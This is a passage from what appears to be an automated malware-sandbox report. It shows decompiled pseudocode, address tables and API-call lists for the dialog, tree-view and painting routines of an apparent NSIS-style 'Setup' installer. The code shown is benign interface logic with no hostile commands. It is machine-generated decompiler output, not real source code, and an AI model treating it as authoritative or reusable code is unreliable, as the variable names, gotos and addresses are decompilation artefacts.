												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                        0x00404cf4
                                                                                        0x00404cfc
                                                                                        0x00404d04
                                                                                        0x00404d0a
                                                                                        0x00404d22
                                                                                        0x00404d25
                                                                                        0x00404d26
                                                                                        0x00404f53
                                                                                        0x00404f5a
                                                                                        0x00404f6e
                                                                                        0x00404f5c
                                                                                        0x00404f5e
                                                                                        0x00404f61
                                                                                        0x00404f62
                                                                                        0x00404f69
                                                                                        0x00404f69
                                                                                        0x00404f7a
                                                                                        0x00404f88
                                                                                        0x00404f8b
                                                                                        0x00404fa1
                                                                                        0x00405016
                                                                                        0x00405019
                                                                                        0x0040501b
                                                                                        0x00405025
                                                                                        0x00405033
                                                                                        0x00405033
                                                                                        0x00405035
                                                                                        0x0040503f
                                                                                        0x00405045
                                                                                        0x00405048
                                                                                        0x0040504b
                                                                                        0x00405066
                                                                                        0x0040504d
                                                                                        0x00405057
                                                                                        0x00405057
                                                                                        0x0040504b
                                                                                        0x0040503f
                                                                                        0x00000000
                                                                                        0x00405019
                                                                                        0x00404fa6
                                                                                        0x00404fb1
                                                                                        0x00404fb6
                                                                                        0x00404fbd
                                                                                        0x00404fc2
                                                                                        0x00404fc6
                                                                                        0x00404fd1
                                                                                        0x00404fd1
                                                                                        0x00404fd5
                                                                                        0x00404fd9
                                                                                        0x00404fdd
                                                                                        0x00404ff0
                                                                                        0x00404fdf
                                                                                        0x00404fdf
                                                                                        0x00404fe6
                                                                                        0x00404fec
                                                                                        0x00404fe8
                                                                                        0x00404fe8
                                                                                        0x00404fe8
                                                                                        0x00404fe6
                                                                                        0x00404ff4
                                                                                        0x00404ff6
                                                                                        0x00405009
                                                                                        0x0040500c
                                                                                        0x0040500f
                                                                                        0x0040500f
                                                                                        0x00404fd9
                                                                                        0x00000000
                                                                                        0x00404fc6
                                                                                        0x00404fa8
                                                                                        0x00404faf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405069
                                                                                        0x00405069
                                                                                        0x00405070
                                                                                        0x004050e1
                                                                                        0x004050e9
                                                                                        0x004050f1
                                                                                        0x004050f1
                                                                                        0x004050fa
                                                                                        0x004050fc
                                                                                        0x00405103
                                                                                        0x00405106
                                                                                        0x00405106
                                                                                        0x0040510c
                                                                                        0x00405113
                                                                                        0x00405116
                                                                                        0x00405116
                                                                                        0x0040511c
                                                                                        0x00405122
                                                                                        0x00405128
                                                                                        0x00405128
                                                                                        0x00405135
                                                                                        0x00405295
                                                                                        0x0040529c
                                                                                        0x004052b9
                                                                                        0x004052bf
                                                                                        0x004052d1
                                                                                        0x004052d1
                                                                                        0x00000000
                                                                                        0x0040513b
                                                                                        0x0040513d
                                                                                        0x00405142
                                                                                        0x00405147
                                                                                        0x0040514c
                                                                                        0x0040514e
                                                                                        0x0040514e
                                                                                        0x0040514f
                                                                                        0x00405150
                                                                                        0x00405152
                                                                                        0x00405152
                                                                                        0x0040515a
                                                                                        0x0040519b
                                                                                        0x0040519d
                                                                                        0x004051ad
                                                                                        0x004051b0
                                                                                        0x004051b5
                                                                                        0x004051bc
                                                                                        0x004051bf
                                                                                        0x00405261
                                                                                        0x00405269
                                                                                        0x00405271
                                                                                        0x00405271
                                                                                        0x00405277
                                                                                        0x0040527f
                                                                                        0x00405290
                                                                                        0x00405290
                                                                                        0x00000000
                                                                                        0x0040527f
                                                                                        0x004051c5
                                                                                        0x004051c8
                                                                                        0x004051ce
                                                                                        0x004051d3
                                                                                        0x004051d5
                                                                                        0x004051d7
                                                                                        0x004051dd
                                                                                        0x004051e4
                                                                                        0x004051e9
                                                                                        0x004051f0
                                                                                        0x004051f3
                                                                                        0x004051f3
                                                                                        0x004051fa
                                                                                        0x00405206
                                                                                        0x0040520a
                                                                                        0x0040520c
                                                                                        0x0040520c
                                                                                        0x004051fc
                                                                                        0x004051fe
                                                                                        0x004051fe
                                                                                        0x0040522c
                                                                                        0x00405238
                                                                                        0x00405247
                                                                                        0x00405247
                                                                                        0x00405249
                                                                                        0x0040524c
                                                                                        0x00405255
                                                                                        0x00000000
                                                                                        0x0040515c
                                                                                        0x00405167
                                                                                        0x0040516a
                                                                                        0x0040516f
                                                                                        0x00405171
                                                                                        0x00405175
                                                                                        0x00405185
                                                                                        0x0040518f
                                                                                        0x00405191
                                                                                        0x00405194
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405177
                                                                                        0x00405177
                                                                                        0x0040517d
                                                                                        0x0040517f
                                                                                        0x0040517f
                                                                                        0x00405180
                                                                                        0x00405181
                                                                                        0x00000000
                                                                                        0x00405177
                                                                                        0x0040515a
                                                                                        0x00405135
                                                                                        0x00405078
                                                                                        0x00000000
                                                                                        0x0040508e
                                                                                        0x00405098
                                                                                        0x0040509d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004050af
                                                                                        0x004050b4
                                                                                        0x004050c0
                                                                                        0x004050c0
                                                                                        0x004050c2
                                                                                        0x004050d1
                                                                                        0x004050d3
                                                                                        0x004050d7
                                                                                        0x004050da
                                                                                        0x00000000
                                                                                        0x004050da
                                                                                        0x00405078
                                                                                        0x00404d2c
                                                                                        0x00404d2f
                                                                                        0x00404d32
                                                                                        0x00404d42
                                                                                        0x00404d55
                                                                                        0x00404d60
                                                                                        0x00404d66
                                                                                        0x00404d74
                                                                                        0x00404d87
                                                                                        0x00404d8c
                                                                                        0x00404d97
                                                                                        0x00404da0
                                                                                        0x00404db6
                                                                                        0x00404dc6
                                                                                        0x00404dd2
                                                                                        0x00404dd2
                                                                                        0x00404dd7
                                                                                        0x00404ddd
                                                                                        0x00404ddf
                                                                                        0x00404de2
                                                                                        0x00404de7
                                                                                        0x00404dec
                                                                                        0x00404dee
                                                                                        0x00404dee
                                                                                        0x00404e0e
                                                                                        0x00404e0e
                                                                                        0x00404e10
                                                                                        0x00404e11
                                                                                        0x00404e16
                                                                                        0x00404e1c
                                                                                        0x00404e20
                                                                                        0x00404e25
                                                                                        0x00404e2d
                                                                                        0x00404e31
                                                                                        0x00404e36
                                                                                        0x00404e3b
                                                                                        0x00404e43
                                                                                        0x00404e46
                                                                                        0x00404f15
                                                                                        0x00404f28
                                                                                        0x00000000
                                                                                        0x00404e4c
                                                                                        0x00404e4f
                                                                                        0x00404e52
                                                                                        0x00404e55
                                                                                        0x00404e55
                                                                                        0x00404e5a
                                                                                        0x00404e63
                                                                                        0x00404e66
                                                                                        0x00404e6a
                                                                                        0x00404e6d
                                                                                        0x00404e70
                                                                                        0x00404e79
                                                                                        0x00404e82
                                                                                        0x00404e85
                                                                                        0x00404e88
                                                                                        0x00404e8b
                                                                                        0x00404ec9
                                                                                        0x00404ef4
                                                                                        0x00404ecb
                                                                                        0x00404eda
                                                                                        0x00404eda
                                                                                        0x00404e8d
                                                                                        0x00404e90
                                                                                        0x00404e9e
                                                                                        0x00404ea8
                                                                                        0x00404eb0
                                                                                        0x00404eb7
                                                                                        0x00404ec2
                                                                                        0x00404ec2
                                                                                        0x00404e8b
                                                                                        0x00404efa
                                                                                        0x00404efb
                                                                                        0x00404f07
                                                                                        0x00404f07
                                                                                        0x00404f13
                                                                                        0x00404f2e
                                                                                        0x00404f31
                                                                                        0x00404f4e
                                                                                        0x00000000
                                                                                        0x00404f33
                                                                                        0x00404f38
                                                                                        0x00404f41
                                                                                        0x004052d3
                                                                                        0x004052e5
                                                                                        0x004052e5
                                                                                        0x00404f31
                                                                                        0x00000000
                                                                                        0x00404f13
                                                                                        0x00404e46

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 00404CED
                                                                                        • GetDlgItem.USER32 ref: 00404CFA
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                        • LoadImageA.USER32 ref: 00404D60
                                                                                        • SetWindowLongA.USER32 ref: 00404D7A
                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                                                        • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                                                          • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                                                        • GetWindowLongA.USER32 ref: 00404F1A
                                                                                        • SetWindowLongA.USER32 ref: 00404F28
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                        • GlobalFree.KERNEL32 ref: 00405116
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                        • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                        • GetDlgItem.USER32 ref: 004052CA
                                                                                        • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 2564846305-813528018
                                                                                        • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                        • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                        • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                        • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 91%
                                                                                        			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x6301d0
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}


















                                                                                        0x0040444c
                                                                                        0x00404571
                                                                                        0x004045cd
                                                                                        0x004045d1
                                                                                        0x0040469e
                                                                                        0x004046a0
                                                                                        0x004046a0
                                                                                        0x004046a6
                                                                                        0x004046a6
                                                                                        0x004046a9
                                                                                        0x00000000
                                                                                        0x004046b0
                                                                                        0x004045df
                                                                                        0x004045e1
                                                                                        0x004045eb
                                                                                        0x004045f6
                                                                                        0x004045f9
                                                                                        0x004045fc
                                                                                        0x00404607
                                                                                        0x0040460a
                                                                                        0x00404611
                                                                                        0x0040461f
                                                                                        0x00404637
                                                                                        0x00404639
                                                                                        0x0040463b
                                                                                        0x00404641
                                                                                        0x00404650
                                                                                        0x00404652
                                                                                        0x00404652
                                                                                        0x00404611
                                                                                        0x0040465c
                                                                                        0x00000000
                                                                                        0x00404667
                                                                                        0x0040466b
                                                                                        0x0040467c
                                                                                        0x0040467c
                                                                                        0x00404682
                                                                                        0x00404690
                                                                                        0x00404690
                                                                                        0x00000000
                                                                                        0x00404694
                                                                                        0x0040465c
                                                                                        0x0040457c
                                                                                        0x00000000
                                                                                        0x00404590
                                                                                        0x00404596
                                                                                        0x0040459c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004045c1
                                                                                        0x004045c3
                                                                                        0x004045c8
                                                                                        0x00000000
                                                                                        0x004045c8
                                                                                        0x0040457c
                                                                                        0x00404452
                                                                                        0x00404455
                                                                                        0x0040445a
                                                                                        0x0040445c
                                                                                        0x0040446b
                                                                                        0x0040446b
                                                                                        0x00404472
                                                                                        0x00404475
                                                                                        0x00404477
                                                                                        0x0040447c
                                                                                        0x00404485
                                                                                        0x0040448b
                                                                                        0x00404497
                                                                                        0x0040449a
                                                                                        0x004044a3
                                                                                        0x004044a8
                                                                                        0x004044ab
                                                                                        0x004044b0
                                                                                        0x004044c7
                                                                                        0x004044ce
                                                                                        0x004044e1
                                                                                        0x004044e4
                                                                                        0x004044f9
                                                                                        0x00404500
                                                                                        0x00404505
                                                                                        0x0040450a
                                                                                        0x0040450a
                                                                                        0x00404519
                                                                                        0x00404528
                                                                                        0x0040453a
                                                                                        0x0040453f
                                                                                        0x0040454f
                                                                                        0x00404551
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044C7
                                                                                        • GetDlgItem.USER32 ref: 004044DB
                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044F9
                                                                                        • GetSysColor.USER32(?), ref: 0040450A
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404519
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404528
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040452B
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453A
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040454F
                                                                                        • GetDlgItem.USER32 ref: 004045B1
                                                                                        • SendMessageA.USER32(00000000), ref: 004045B4
                                                                                        • GetDlgItem.USER32 ref: 004045DF
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040461F
                                                                                        • LoadCursorA.USER32 ref: 0040462E
                                                                                        • SetCursor.USER32(00000000), ref: 00404637
                                                                                        • LoadCursorA.USER32 ref: 0040464D
                                                                                        • SetCursor.USER32(00000000), ref: 00404650
                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467C
                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404690
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                        • String ID: N$B
                                                                                        • API String ID: 3103080414-4074832742
                                                                                        • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                        • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                                        • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                                        • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                        0x0040100a
                                                                                        0x00401039
                                                                                        0x00401047
                                                                                        0x0040104d
                                                                                        0x00401051
                                                                                        0x0040105b
                                                                                        0x00401061
                                                                                        0x00401064
                                                                                        0x004010f3
                                                                                        0x00401089
                                                                                        0x0040108c
                                                                                        0x004010a6
                                                                                        0x004010bd
                                                                                        0x004010cc
                                                                                        0x004010cf
                                                                                        0x004010d5
                                                                                        0x004010d9
                                                                                        0x004010e4
                                                                                        0x004010ed
                                                                                        0x004010ef
                                                                                        0x004010ef
                                                                                        0x00401100
                                                                                        0x00401105
                                                                                        0x0040110d
                                                                                        0x00401110
                                                                                        0x00401112
                                                                                        0x00401118
                                                                                        0x0040111f
                                                                                        0x00401126
                                                                                        0x00401130
                                                                                        0x00401142
                                                                                        0x00401156
                                                                                        0x00401160
                                                                                        0x00401165
                                                                                        0x00401165
                                                                                        0x00401110
                                                                                        0x0040116e
                                                                                        0x00000000
                                                                                        0x00401178
                                                                                        0x00401010
                                                                                        0x00401013
                                                                                        0x00401015
                                                                                        0x0040101f
                                                                                        0x0040101f
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
